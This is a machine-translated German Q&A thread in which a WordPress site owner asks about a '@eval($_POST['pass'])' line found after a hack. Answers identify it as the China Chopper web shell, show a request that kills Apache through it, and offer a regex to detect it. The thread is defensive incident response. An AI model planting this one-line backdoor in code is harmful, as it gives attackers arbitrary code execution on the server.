Gefunden <?php @eval($_POST['pass']);?> code in wordpress-Seite

Fand ich diesen code in einer meiner wordpress-plugin-site.
Ich denke, es kann verwendet werden, mit böswilliger Absicht, aber was genau tut es und kann ich herausfinden, ob es fordert einige andere Aktionen, die ich beachten sollte?

  • Ich bräuchte ein paar umliegenden code. Was macht das plugin tun? Der Vorsatz war meine erste Vermutung auch.
  • Es ist eine Vertrauenswürdige plugin WP Migrate DB, aber die Website wurde gehackt und ich bin versucht zu reinigen, bis alle Rückstände
  • Ich bin nicht sicher, können Sie sagen, ob es ein hack ohne Blick auf all die anderen code, die, wenn Ihre Website gehackt wurde, könnte sich jede wordpress-Datei überhaupt. Würde ich WP neu installieren und alle plugins aus vertrauenswürdigen Quellen. Alternativ können Sie immer versuchen das auskommentieren der Zeile und sehen, wenn etwas bricht 🙂
  • Ich vergaß zu erwähnen, ist das der einzige code in der Datei. Die Datei heißt functions.php also ich denke, dass Sie tiefer in das plugin-Verzeichnis ist es sicher zu löschen.
  • Das scheint zu bedeuten, dass es eine andere Datei irgendwo aufruft functions.php und nutzt es zu schnappen Sie sich Ihr Kennwort, ohne dass es offensichtlich ist, dass es den Umgang mit Ihrem Passwort. Ich würde diese Datei eine 99% ige chance, Teil von einem hack. Ich würde löschen alle deine plugins und installieren Sie Sie zumindest
  • Ich habe die Datei gelöscht und die website ist in Ordnung. Möchte nur wissen ob es mehr zu... danke für die Hilfe trotzdem.
  • Es sieht sehr schlecht aus. Wahrscheinlich war es nicht die einzige Hintertür.
  • Ich lief WordFence auf der WordPress-Website, die ich war Befestigungs - und ich dachte, ich hatte fest - es fanden zwei weitere große Heldentaten.

InformationsquelleAutor Jessica217 | 2015-09-19
  1. 5

    Dieses PHP-script gehört zu China Chopper Hacking Kit.

    https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

    • Sorry, nun zu wissen, wie würden Sie jagen Sie nach unten auf die server, da die Suche nur Kennwort oder pass geben würde zu viele Ergebnisse... ?
    • Sie möchten einen Versuch : github.com/emposha/PHP-Shell-Detector
    • Eine weitere option ist die Verwendung von Reg-Ex.. so Etwas wie dieses : /<?php.\@eval(\$_POST./
    • Kann eine kurze post, aber es ist ein hervorragender Artikel - danke - wenn Sie bereits getroffen, verpassen Sie nicht das entfernen der Einträge in der Datenbank.
    InformationsquelleAutor Dev.K.
  2. 3

    Ja, es ist sehr schlecht. Ich kann mir nicht vorstellen, jede situation, wo dieser code vorhanden sein könnte als Teil einer harmlosen software.

    Dieser code im wesentlichen ermöglicht das ausführen beliebigen php-code durch die pass get-parameter. Zum Beispiel der Aufruf dieser php als http://yoursite/your.php?pass=system("killall -9 apache"); wird erschossen auf Ihrem webserver. Aber es ist verwendbar für alles (einschließlich überschreiben /erweitern Sie Ihre vorhandenen Skripte speichern, um das Website-Passwörter in eine temporäre Datei. Und später, um diese temporäre Datei zurück).

    Ist es wahrscheinlich eine backdoor, und wahrscheinlich nicht der einzige. Ihre Website braucht ein tiefes security-check.

    • Dank Peter. Ich nahm mir die website nach unten und gehen durch Sie mit anti-virus-und anti-malware-scan. Gibt es eine Liste von möglichen bösartigen codes, die ich versuchen könnte, und durchsuchen Sie die Dateien?
    • Eigentlich Peter, wohl wissend, dass das Stück code zu schreiben, der die Seite Passwort zu einer Datei, wie würde man herausfinden, wo die Datei sich befindet, und die Art und Weise Angreifer ist die Teilnahme an Anzeige/download der Datei?
    • Eigentlich wissen Sie nicht, was der code tut, kann der Angreifer das senden einer POST-Anforderung und können, was immer er möchte in die 'pass' - Feld. Statt einem Passwort wird er in einem Skript, die er ausführen will.
    • Okay danke. Könnte ich Scannen einer website für die 'pass' - Feld und gehen Sie dann langsam, um zu sehen, was jeder tut?
    • Sie können das tun, aber es gewann' helfen, eine Menge in Ihrem aktuellen problem. "passieren", wie ein Variablenname, wird wahrscheinlich im Rahmen von "passthrough" oder "Passwort" verwendet. In Ihrem aktuellen Kontext wurde es als "pass", da eine variable mit dem Namen $codeToRunInBackdoor hatte vielleicht ein bisschen schrill.
    InformationsquelleAutor peterh says reinstate Monica
Schreibe einen Kommentar